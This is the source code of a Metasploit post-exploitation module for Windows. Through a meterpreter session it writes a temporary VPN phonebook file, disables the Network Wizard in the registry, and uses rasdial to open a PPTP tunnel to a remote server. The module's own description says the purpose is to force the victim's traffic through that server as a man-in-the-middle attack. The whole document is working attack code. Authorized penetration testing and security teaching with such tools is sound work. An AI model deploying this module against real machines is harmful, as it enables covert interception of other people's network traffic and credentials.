Path: blob/master/modules/post/windows/manage/pptp_tunnel.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Priv8include Msf::Post::Windows::Registry910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',15'Description' => %q{16This module initiates a PPTP connection to a remote machine (VPN server). Once17the tunnel is created we can use it to force the victim traffic to go through the18server getting a man in the middle attack. Be sure to allow forwarding and19masquerading on the VPN server (mitm).20},21'License' => MSF_LICENSE,22'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',23'References' => [24[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]25],26'Platform' => 'win',27'SessionTypes' => [ 'meterpreter' ],28'Notes' => {29'Stability' => [CRASH_SAFE],30'SideEffects' => [CONFIG_CHANGES],31'Reliability' => []32}33)34)3536register_options(37[38OptString.new('USERNAME', [true, 'VPN Username.' ]),39OptString.new('PASSWORD', [true, 'VPN Password.' ]),40OptBool.new('MITM', [true, 'Man in the middle.', true]),41OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),42OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),43OptAddress.new('VPNHOST', [true, 'VPN server.'])44]45)46end4748def run49version = get_version_info50disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)5152pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])53to = (datastore['TIMEOUT'] <= 0) ? 60 : datastore['TIMEOUT']54begin55::Timeout.timeout(to) do56run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])57end58rescue ::Timeout::Error59print_error("Timeout after #{to} seconds")60end61file_rm(pbk)62print_status('Phonebook deleted')63end6465def disable_network_wizard66if !is_admin?67print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")68return69end7071key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'72value = 'NewNetworkWindowOff'73begin74if !registry_getvaldata(key, value)75registry_setvaldata(key, value, 3, 'REG_BINARY')76print_good('Network Wizard disabled')77end78rescue StandardError => e79print_status("The following error was encountered: #{e.class} #{e}")80end81end8283def create_pbk(mim, pbk_name)84pbk_dir = expand_path('%TEMP%')85pbk_file = pbk_dir << '\\' << Rex::Text.rand_text_alpha(6..13) << '.pbk'8687conf_conn = "[#{pbk_name}]\r\n\r\n"88conf_conn += "MEDIA=rastapi\r\n"89conf_conn += "Port=VPN4-0\r\n"90conf_conn += "DEVICE=vpn\r\n"91conf_conn += "IpPrioritizeRemote=0\r\n" unless mim9293if write_file(pbk_file, conf_conn)94print_good("PhoneBook configuration written to #{pbk_file}")95return pbk_file96end97end9899def run_rasdial(pbk, user, pass, vpn_host, pbk_name)100print_status('Establishing connection ...')101cmd_exec('rasdial', '/disconnect')102output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")103output_view = cmd_exec('rasdial', nil)104105if output_view =~ /#{pbk_name}/i106print_good('Connection Successful')107else108print_error("Connection failure: #{output_run}")109end110end111end112113114